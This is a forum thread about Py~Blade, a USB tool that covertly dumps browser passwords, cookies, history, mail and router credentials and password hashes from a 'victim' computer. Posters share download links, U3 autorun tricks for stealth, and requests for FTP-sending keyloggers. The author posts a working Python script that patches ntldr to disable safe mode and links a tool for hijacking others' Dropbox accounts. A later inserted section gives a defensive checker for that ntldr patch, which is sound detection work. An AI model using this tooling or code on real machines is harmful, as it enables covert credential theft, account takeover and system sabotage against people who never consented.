Guest seksi90210 Posted December 23, 2010
I have not had a chance to check this post in a long while, been so busy. Sadly, I see no updates and assume sablefoxx is busy as well. I hope to see this project continued =]

sablefoxx Posted January 27, 2011 (Author)
I haven't had much time to develop Py~Blade recently, so here is the current source code. It's got a few bugs but feel free to hack it up. This isn't an official release but feel free to post patches, or any cool modifications you guys make. I'll get around to writing some more stuff in the summer (hopefully). (Go forth and learn Python! http://docs.python.org)
http://dl.dropbox.com/u/341940/pyblade.tar.gz
Edited January 27, 2011 by sablefoxx

Jen Posted January 28, 2011
Thanks a lot sablefoxx!! This will definitely motivate me into learning python!

blksith0 Posted February 1, 2011
Now is there a way to get the Autoplay Dialogue to stop popping up, asking what to do, on the test subject's computer?

m1k Posted February 13, 2011
I did experience some problems... no more Firefox pass logs so... I tried and tried... Solution? Just put Pyblade 0.1 on the USB key... everything works like a charm... ;)

help Posted March 13, 2011
@Emptiness: idk how the pyload is configured (or built, I haven't checked the .py files), but when I tried to run it from a random folder (on my D drive) it complained about the folder D:\logs\%pcname%%HOUR%-%MINUTES%\ that didn't exist. I can only conclude that the pyload is made to be run only from the root of a drive (that's what sablefoxx said in his first post I believe).
**if this ain't right the rest of this part doesn't matter**
What the U3 shit does is placing it somewhere else and making it run from there. If the only reason u guys want it to be U3 is to make it autorunnable, well fine, here's a solution: make a .BAT file that goes to the root of the drive and then runs the bex.exe (that is placed in the root of the drive), then make that bat into an .exe (bat to exe converter, google it), then convert the exe into an .u3p (PackageFactory, once again google it), then install the .u3p onto your U3 drive....
Going to the root of the drive can be generally done in two ways:
    cd..
    cd..
    cd..
    cd..
    ... (you got the point I guess)
    cd..
or
    %~d0
If you got Firefox password stealer problems, just get the newest version from their site....

doopliss Posted June 6, 2011
I don't know how alive this project still is, but I did some work on it so I guess I might as well post it... I used the old, stable source from the first post rather than the newest source that sablefoxx dumped. It should have all of the features in the OP, plus the features listed below.

Added features:
- The system info log now shows the target's public IP address, and gets it from 5 different sources for redundancy's sake. Should be useful for accessing that FTP backdoor
- Browser passwords can all be saved in one file, one file per browser, or both
- Dumps the saved cache for IE, Chrome, and Firefox
- Dumps the saved cookies of Chrome, Firefox, and Flash (couldn't get IE working)
- Dumps the saved history for Chrome and Firefox in addition to IE
- Dumps passwords saved in popular mail clients
- Dumps password to access the victim's router (unfortunately only works on a small set of routers)
- Modified U3 support: The drive now executes FBex without launching the U3 launchpad, making it stealthier

Known issues:
- PWDump is the only bit of the program that isn't working on 64-bit systems
- IE Cookie Viewer doesn't save

I could not for the life of me figure out how to get PWDump working. I used sablefoxx's original code, it didn't work. I rewrote it, it didn't work. I don't know what to do. Here's an odd little note, though: whenever I compiled bex.exe using py2exe on a 64-bit system, PWDump DID work on 64-bit systems, but the entire EXE wouldn't execute on any 32-bit system ("Not a valid Win32 application" error). Whenever I compiled the .exe on a 32-bit system, all of the .exe worked on 32-bit systems, and most of it worked on 64-bit systems, but not PWDump. For now, I just disabled PWDump in the configuration file by default (you can turn it on if you know the target is running 32-bit). It could have something to do with using an out-of-date version of PWDump, but I'm too frustrated with it by now to care... Apparently this wasn't an issue for others using sablefoxx's code, so maybe it's just me...

Here is the modified U3 launcher, using Universal Customizer (Windows XP only): http://www.mediafire.com/?v82c88r8bc68i8y
Just extract the files, click the Universal Customizer application, and follow the instructions, the .iso should've already been made.
For those of you who can't run the above because you don't have XP, here is the .iso by itself: http://www.mediafire.com/?m2rc6158y2dxryt
It needs to be burned to the virtual optical drive of your U3 device.
Here is the blade, just extract to the root of the flash drive: http://www.mediafire.com/?2sogp1cy7lzt824
And finally, here's the source: http://www.mediafire.com/?z6d4c116i75cn3p

Does anyone know any open source keyloggers that send the logs to an FTP server? I included a keylogger in my blade, but I couldn't upload that version because the one I used is commercial. If there was a good open source one, that'd be a cool thing to add.
*Fwew!* Well, that certainly was a fun exercise in learning Python. Thank you for uploading the source, sablefoxx ^_^

Jen Posted June 8, 2011
I'll help you test soon after school ends. Tell me if you need a specific beta tester or something, I'm glad someone is still working on this project!!

sablefoxx Posted June 23, 2011 (Author)
Glad to see the project is moving forward. May I humbly suggest adding this little script I wrote recently. Allows you to copy other people's dropbox accounts and maintain access to them even if they change their password. Perfect for flash drives/switchblades!
http://ge.tt/8nETsM5?c
And if you're feeling a bit evil, disable safe mode (XP/2k3):

    # Python 2.x Code
    import os
    import mmap

    def patchNtldr(ntldr = 'C:\\ntldr'):
        file = open(ntldr, 'r+')
        size = os.path.getsize(ntldr)
        map = mmap.mmap(file.fileno(), size)
        map.seek(1915) # Jump to offset
        map.write_byte('\x90') # NOP Sled, whee!
        map.write_byte('\x90')
        map.write_byte('\x90')
        map.close()

    if __name__ == '__main__':
        patchNtldr()

Edited June 23, 2011 by sablefoxx

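A defender-side check for the ntldr modification in the post above, added here as an example and not part of the original thread: it reports whether a copy of the file carries the three 0x90 bytes at offset 1915 and whether its SHA-256 differs from a baseline you supply. The function names, the sample images and the baseline are constructed for illustration; matching bytes are only an indicator, since the thread does not say what the unmodified bytes are.

```python
import hashlib

# Values taken from the script posted above: it seeks to offset 1915
# and writes three 0x90 (NOP) bytes.
PATCH_OFFSET = 1915
PATCH_BYTES = b"\x90" * 3


def inspect_bytes(data, known_good_sha256=None):
    """Triage a boot-loader image held in memory; returns a findings dict."""
    window = data[PATCH_OFFSET:PATCH_OFFSET + len(PATCH_BYTES)]
    digest = hashlib.sha256(data).hexdigest()
    findings = {
        "sha256": digest,
        "bytes_at_offset": window.hex(),
        "truncated": len(window) < len(PATCH_BYTES),
        "nop_patch_present": window == PATCH_BYTES,
        # None means no baseline was supplied, so no verdict on the hash.
        "hash_mismatch": None,
    }
    if known_good_sha256 is not None:
        findings["hash_mismatch"] = digest != known_good_sha256.lower()
    return findings


def inspect_loader(path, known_good_sha256=None):
    """Read the file at `path` (e.g. a copy of ntldr from a disk image)."""
    with open(path, "rb") as fh:
        return inspect_bytes(fh.read(), known_good_sha256)


def build_sample(patched):
    """Constructed stand-in for ntldr: filler bytes, optionally patched."""
    data = bytearray(b"\xcc" * 4096)
    if patched:
        data[PATCH_OFFSET:PATCH_OFFSET + 3] = PATCH_BYTES
    return bytes(data)


if __name__ == "__main__":
    clean = build_sample(patched=False)
    baseline = hashlib.sha256(clean).hexdigest()
    for label, image in (("clean", clean), ("patched", build_sample(True))):
        print(label, inspect_bytes(image, baseline))
```

The baseline hash should come from a trusted copy of the same ntldr build, for example one extracted from the matching installation media.
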
Jen Posted June 24, 2011
Hey sablefoxx, are you still continuing on this project or doing another one?

m1k Posted July 19, 2011
Mubix posted the link... http://www.moonsols.com/2011/07/18/moonsols-dumpit-goes-mainstream/
Not bad as a PyBlade add-on!

chr0megreyl0tus Posted July 19, 2011
> Mubix posted the link... http://www.moonsols.com/2011/07/18/moonsols-dumpit-goes-mainstream/
> Not bad as a PyBlade add-on!

I think that it would be impractical to add a memory dumping tool to a project like this. A memory dumper dumps the entire contents of the installed memory on the system. So let's say you added this onto Pyblade: your USB would then dump the entire system memory, so if the system had 8 GB of RAM, around 8 GB of data would be dumped onto your USB. For a tool like Pyblade, which is intended to be inserted into a computer and removed quickly, it would add a lot of time depending on the amount of RAM installed on the computer. Not saying that this tool is bad, I just think that it was more intended for incident response teams, as they can use dumpit on their USB without any concern for how long the data will take to copy, as long as they get their memory dump. Maybe dumpit can be added on to the incident response switchblade. Although this could very well change with USB 3.0 becoming mainstream, as we could dump the memory a lot faster. But for now I would recommend dumpit for more incident response tool/USB kits. That's my 2 cents anyway.

m1k Posted July 20, 2011
You are absolutely right... Just set as an option, if you have time, 8 GB pendrive and 4 GB victim's computer memory. ;)

imJustaTechnician Posted January 19, 2012
Any more updates? =D Should need one for Internet Explorer 9.

Batman Posted April 3, 2012
Hello, this is a great piece of software. Kudos. I have a question somewhat related to the software, but also towards Windows 7. If a user does not have admin access on a computer running Windows 7 64-bit, will they be able to run this off of a USB drive?

Optimalised Posted April 16, 2012
So how come Pyblade 3.0 doesn't show me IE Logins/PWs even though it's on 1? =/

Light Posted April 17, 2012
Are there any new updates on this? I was wanting to get the updated U3 files but they aren't there anymore. If anyone can help that would be great.

Tox1k Posted April 19, 2012
> So how come Pyblade 3.0 doesn't show me IE Logins/PWs even though it's on 1? =/

You need to go to nirsofter's site and download the latest files in there, IEPassview and FireFoxPassView and a few others. All the files in there are probably still from when XP was in its middle stage.

xBello12 Posted November 4, 2013
We need new download links